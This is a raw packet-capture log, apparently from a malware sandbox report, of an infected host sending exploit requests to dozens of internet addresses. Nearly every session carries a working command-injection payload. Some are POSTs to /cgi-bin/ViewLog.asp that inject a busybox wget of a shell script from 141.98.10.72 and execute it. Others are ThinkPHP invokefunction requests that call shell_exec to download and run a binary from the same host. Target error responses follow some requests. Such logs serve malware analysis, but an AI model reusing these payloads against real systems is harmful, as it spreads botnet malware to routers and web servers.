                                                      Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      988192.168.2.153819095.141.101.1138080
                                                      TimestampBytes transferredDirectionData
                                                      Feb 14, 2024 09:31:06.544763088 CET326OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                      Host: 192.168.0.14:80
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: */*
                                                      User-Agent: python-requests/2.20.0
                                                      Content-Length: 227
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                      Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      989192.168.2.154616095.101.220.17280
                                                      TimestampBytes transferredDirectionData
                                                      Feb 14, 2024 09:31:06.716394901 CET331OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: /
                                                      User-Agent: Uirusu/2.0
                                                      Feb 14, 2024 09:31:06.931956053 CET480INHTTP/1.0 400 Bad Request
                                                      Server: AkamaiGHost
                                                      Mime-Version: 1.0
                                                      Content-Type: text/html
                                                      Content-Length: 258
                                                      Expires: Wed, 14 Feb 2024 08:31:06 GMT
                                                      Date: Wed, 14 Feb 2024 08:31:06 GMT
                                                      Connection: close
                                                      Data Raw: 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 0a 3c 54 49 54 4c 45 3e 49 6e 76 61 6c 69 64 20 55 52 4c 3c 2f 54 49 54 4c 45 3e 0a 3c 2f 48 45 41 44 3e 3c 42 4f 44 59 3e 0a 3c 48 31 3e 49 6e 76 61 6c 69 64 20 55 52 4c 3c 2f 48 31 3e 0a 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 22 68 74 74 70 26 23 35 38 3b 26 23 34 37 3b 26 23 34 37 3b 26 23 33 37 3b 35 62 4e 6f 26 23 33 37 3b 32 30 48 6f 73 74 26 23 33 37 3b 35 64 26 23 34 37 3b 69 6e 64 65 78 26 23 34 36 3b 70 68 70 26 23 36 33 3b 22 2c 20 69 73 20 69 6e 76 61 6c 69 64 2e 3c 70 3e 0a 52 65 66 65 72 65 6e 63 65 26 23 33 32 3b 26 23 33 35 3b 39 26 23 34 36 3b 32 66 30 62 31 35 30 32 26 23 34 36 3b 31 37 30 37 38 39 39 34 36 36 26 23 34 36 3b 32 30 66 39 32 39 38 66 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0a
                                                      Data Ascii: <HTML><HEAD><TITLE>Invalid URL</TITLE></HEAD><BODY><H1>Invalid URL</H1>The requested URL "http&#58;&#47;&#47;&#37;5bNo&#37;20Host&#37;5d&#47;index&#46;php&#63;", is invalid.<p>Reference&#32;&#35;9&#46;2f0b1502&#46;1707899466&#46;20f9298f</BODY></HTML>


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      990192.168.2.153325495.42.211.5580
                                                      TimestampBytes transferredDirectionData
                                                      Feb 14, 2024 09:31:06.727202892 CET331OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: /
                                                      User-Agent: Uirusu/2.0
                                                      Feb 14, 2024 09:31:06.955039978 CET275INHTTP/1.1 505 HTTP Version not supported
                                                      Content-Type: text/html; charset=utf-8
                                                      Content-Length: 140
                                                      Connection: close
                                                      Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 35 30 35 20 48 54 54 50 20 56 65 72 73 69 6f 6e 20 6e 6f 74 20 73 75 70 70 6f 72 74 65 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 35 30 35 20 48 54 54 50 20 56 65 72 73 69 6f 6e 20 6e 6f 74 20 73 75 70 70 6f 72 74 65 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e
                                                      Data Ascii: <html><head><title>505 HTTP Version not supported</title></head><body><center><h1>505 HTTP Version not supported</h1></center></body></html>


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      991192.168.2.154307895.237.209.8180
                                                      TimestampBytes transferredDirectionData
                                                      Feb 14, 2024 09:31:06.734740019 CET331OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: /
                                                      User-Agent: Uirusu/2.0
                                                      Feb 14, 2024 09:31:06.969922066 CET511INHTTP/1.1 400 Bad Request
                                                      Date: Wed, 14 Feb 2024 08:31:06 GMT
                                                      Server: Apache/2.4.57 (Debian)
                                                      Content-Length: 317
                                                      Connection: close
                                                      Content-Type: text/html; charset=iso-8859-1
                                                      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 0a 3c 70 3e 59 6f 75 72 20 62 72 6f 77 73 65 72 20 73 65 6e 74 20 61 20 72 65 71 75 65 73 74 20 74 68 61 74 20 74 68 69 73 20 73 65 72 76 65 72 20 63 6f 75 6c 64 20 6e 6f 74 20 75 6e 64 65 72 73 74 61 6e 64 2e 3c 62 72 20 2f 3e 0a 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 35 37 20 28 44 65 62 69 61 6e 29 20 53 65 72 76 65 72 20 61 74 20 70 63 2d 32 32 2e 73 6d 64 61 74 61 2d 6c 61 62 2e 64 64 6e 73 2e 6e 65 74 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                      Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>400 Bad Request</title></head><body><h1>Bad Request</h1><p>Your browser sent a request that this server could not understand.<br /></p><hr><address>Apache/2.4.57 (Debian) Server at pc-22.smdata-lab.ddns.net Port 80</address></body></html>


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      992192.168.2.154489031.148.246.38080
                                                      TimestampBytes transferredDirectionData
                                                      Feb 14, 2024 09:31:07.268676043 CET326OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                      Host: 192.168.0.14:80
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: */*
                                                      User-Agent: python-requests/2.20.0
                                                      Content-Length: 227
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                      Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                      Feb 14, 2024 09:31:07.504666090 CET94INHTTP/1.1 404 Not Found
                                                      Date: Wed, 14 Feb 2024 08:31:07 GMT
                                                      Connection: Close


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      993192.168.2.154494431.148.246.38080
                                                      TimestampBytes transferredDirectionData
                                                      Feb 14, 2024 09:31:07.503560066 CET326OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                      Host: 192.168.0.14:80
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: */*
                                                      User-Agent: python-requests/2.20.0
                                                      Content-Length: 227
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                      Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                      Feb 14, 2024 09:31:07.732033968 CET94INHTTP/1.1 404 Not Found
                                                      Date: Wed, 14 Feb 2024 08:31:07 GMT
                                                      Connection: Close


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      994192.168.2.154888695.210.96.1388080
                                                      TimestampBytes transferredDirectionData
                                                      Feb 14, 2024 09:31:07.696815014 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                      Host: 192.168.0.14:80
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: */*
                                                      User-Agent: python-requests/2.20.0
                                                      Content-Length: 227
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                      Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      995192.168.2.153856495.165.172.208080
                                                      TimestampBytes transferredDirectionData
                                                      Feb 14, 2024 09:31:07.731843948 CET326OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                      Host: 192.168.0.14:80
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: */*
                                                      User-Agent: python-requests/2.20.0
                                                      Content-Length: 227
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                      Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                      Feb 14, 2024 09:31:07.964174986 CET438INHTTP/1.1 404 Not Found
                                                      Date: Wed, 14 Feb 2024 11:31:06 GMT
                                                      Server: Webs
                                                      X-Frame-Options: SAMEORIGIN
                                                      Cache-Control: no-cache
                                                      Content-Length: 193
                                                      Content-Type: text/html
                                                      Connection: keep-alive
                                                      Keep-Alive: timeout=60, max=99
                                                      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 44 6f 63 75 6d 65 6e 74 20 45 72 72 6f 72 3a 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 3c 68 32 3e 41 63 63 65 73 73 20 45 72 72 6f 72 3a 20 34 30 34 20 2d 2d 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 32 3e 0d 0a 3c 70 3e 43 61 6e 27 74 20 6f 70 65 6e 20 64 6f 63 75 6d 65 6e 74 3a 20 2f 63 67 69 2d 62 69 6e 2f 56 69 65 77 4c 6f 67 2e 61 73 70 3c 2f 70 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                      Data Ascii: <!DOCTYPE html><html><head><title>Document Error: Not Found</title></head><body><h2>Access Error: 404 -- Not Found</h2><p>Can't open document: /cgi-bin/ViewLog.asp</p></body></html>


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      996192.168.2.154016031.128.222.1088080
                                                      TimestampBytes transferredDirectionData
                                                      Feb 14, 2024 09:31:07.946805954 CET326OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                      Host: 192.168.0.14:80
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: */*
                                                      User-Agent: python-requests/2.20.0
                                                      Content-Length: 227
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                      Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                      Feb 14, 2024 09:31:08.197068930 CET469INHTTP/1.1 500 Internal Server Error
                                                      Content-Type: text/html; charset=utf-8
                                                      X-Frame-Options: SAMEORIGIN
                                                      Content-Security-Policy: frame-ancestors 'none'
                                                      Strict-Transport-Security: max-age=3600
                                                      Content-Length: 130
                                                      Set-Cookie: JSESSIONID=deleted; Expires=Thu, 01 Jan 1970 00:00:01 GMT; Path=/; HttpOnly
                                                      Connection: close
                                                      Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 35 30 30 20 49 6e 74 65 72 6e 61 6c 20 53 65 72 76 65 72 20 45 72 72 6f 72 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 35 30 30 20 49 6e 74 65 72 6e 61 6c 20 53 65 72 76 65 72 20 45 72 72 6f 72 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e
                                                      Data Ascii: <html><head><title>500 Internal Server Error</title></head><body><center><h1>500 Internal Server Error</h1></center></body></html>


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      997192.168.2.153313231.168.190.1508080
                                                      TimestampBytes transferredDirectionData
                                                      Feb 14, 2024 09:31:07.949218988 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                      Host: 192.168.0.14:80
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: */*
                                                      User-Agent: python-requests/2.20.0
                                                      Content-Length: 227
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                      Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                      Feb 14, 2024 09:31:08.206794024 CET659INHTTP/1.0 404 Not Found !!!
                                                      Pragma: no-cache
                                                      Content-type: text/html
                                                      <html> <head> <title>404 Not Found !!!</title> </head><body><div align="center"><center><table border="1" cellspacing="0" width="100%"> <tr> <td width="100%" bgcolor="#0000A0"> <p align="center"><font color="#FFFFFF" face="Arial"> <strong>404 Not Found !!!</strong></font></td> </tr> <tr> <td width="100%" bgcolor="#F3F3F3" bordercolor="#000080" bordercolordark="#000080"> <p align="center"><font face="Times New Romain" color="#000000"> <strong>The requested URL was not found on this server.</strong></font></td> </tr></table></body></html>
                                                      Data Raw:
                                                      Data Ascii:


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      998192.168.2.1559996112.158.120.20880
                                                      TimestampBytes transferredDirectionData
                                                      Feb 14, 2024 09:31:09.292148113 CET331OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: /
                                                      User-Agent: Uirusu/2.0


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      999192.168.2.153653295.141.251.24980
                                                      TimestampBytes transferredDirectionData
                                                      Feb 14, 2024 09:31:09.838797092 CET331OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: /
                                                      User-Agent: Uirusu/2.0
                                                      Feb 14, 2024 09:31:10.077884912 CET307INHTTP/1.1 400 Bad Request
                                                      Server: nginx
                                                      Date: Wed, 14 Feb 2024 08:31:09 GMT
                                                      Content-Type: text/html
                                                      Content-Length: 150
                                                      Connection: close
                                                      Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                      Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>nginx</center></body></html>


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      1000192.168.2.155351631.136.72.1098080
                                                      TimestampBytes transferredDirectionData
                                                      Feb 14, 2024 09:31:10.465004921 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                      Host: 192.168.0.14:80
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: */*
                                                      User-Agent: python-requests/2.20.0
                                                      Content-Length: 227
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                      Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                      Feb 14, 2024 09:31:13.559209108 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                      Host: 192.168.0.14:80
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: */*
                                                      User-Agent: python-requests/2.20.0
                                                      Content-Length: 227
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                      Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                      Feb 14, 2024 09:31:19.703156948 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                      Host: 192.168.0.14:80
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: */*
                                                      User-Agent: python-requests/2.20.0
                                                      Content-Length: 227
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                      Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                      Feb 14, 2024 09:31:31.734875917 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                      Host: 192.168.0.14:80
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: */*
                                                      User-Agent: python-requests/2.20.0
                                                      Content-Length: 227
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                      Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                      Feb 14, 2024 09:31:57.078003883 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                      Host: 192.168.0.14:80
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: */*
                                                      User-Agent: python-requests/2.20.0
                                                      Content-Length: 227
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                      Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      1001192.168.2.154251494.23.166.1188080
                                                      TimestampBytes transferredDirectionData
                                                      Feb 14, 2024 09:31:10.483541012 CET326OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                      Host: 192.168.0.14:80
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: */*
                                                      User-Agent: python-requests/2.20.0
                                                      Content-Length: 227
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                      Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                      Feb 14, 2024 09:31:10.703769922 CET304INHTTP/1.1 400 Bad Request
                                                      Date: Wed, 14 Feb 2024 08:31:10 GMT
                                                      Server: Apache
                                                      Content-Length: 126
                                                      Connection: close
                                                      Content-Type: text/html; charset=iso-8859-1
                                                      Data Raw: 3c 73 63 72 69 70 74 3e 64 6f 63 75 6d 65 6e 74 2e 6c 6f 63 61 74 69 6f 6e 2e 68 72 65 66 3d 27 68 74 74 70 73 3a 2f 2f 27 2b 6c 6f 63 61 74 69 6f 6e 2e 68 6f 73 74 6e 61 6d 65 2b 27 3a 27 2b 6c 6f 63 61 74 69 6f 6e 2e 70 6f 72 74 3b 3c 2f 73 63 72 69 70 74 3e 3c 68 31 3e 45 72 72 6f 72 20 34 30 30 20 2d 20 74 72 79 69 6e 67 20 74 6f 20 72 65 64 69 72 65 63 74 3c 2f 68 31 3e
                                                      Data Ascii: <script>document.location.href='https://'+location.hostname+':'+location.port;</script><h1>Error 400 - trying to redirect</h1>


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      1002192.168.2.153629494.122.87.1478080
                                                      TimestampBytes transferredDirectionData
                                                      Feb 14, 2024 09:31:10.510863066 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                      Host: 192.168.0.14:80
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: */*
                                                      User-Agent: python-requests/2.20.0
                                                      Content-Length: 227
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                      Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      1003192.168.2.155269695.164.169.1628080
                                                      TimestampBytes transferredDirectionData
                                                      Feb 14, 2024 09:31:10.583962917 CET326OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                      Host: 192.168.0.14:80
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: */*
                                                      User-Agent: python-requests/2.20.0
                                                      Content-Length: 227
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                      Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                      Feb 14, 2024 09:31:10.774641037 CET1260INHTTP/1.1 400 Bad Request
                                                      Server: squid/4.10
                                                      Mime-Version: 1.0
                                                      Date: Wed, 14 Feb 2024 08:31:10 GMT
                                                      Content-Type: text/html;charset=utf-8
                                                      Content-Length: 3543
                                                      X-Squid-Error: ERR_INVALID_URL 0
                                                      Vary: Accept-Language
                                                      Content-Language: en
                                                      X-Cache: MISS from localhost
                                                      X-Cache-Lookup: NONE from localhost:8080
                                                      Via: 1.1 localhost (squid/4.10)
                                                      Connection: close
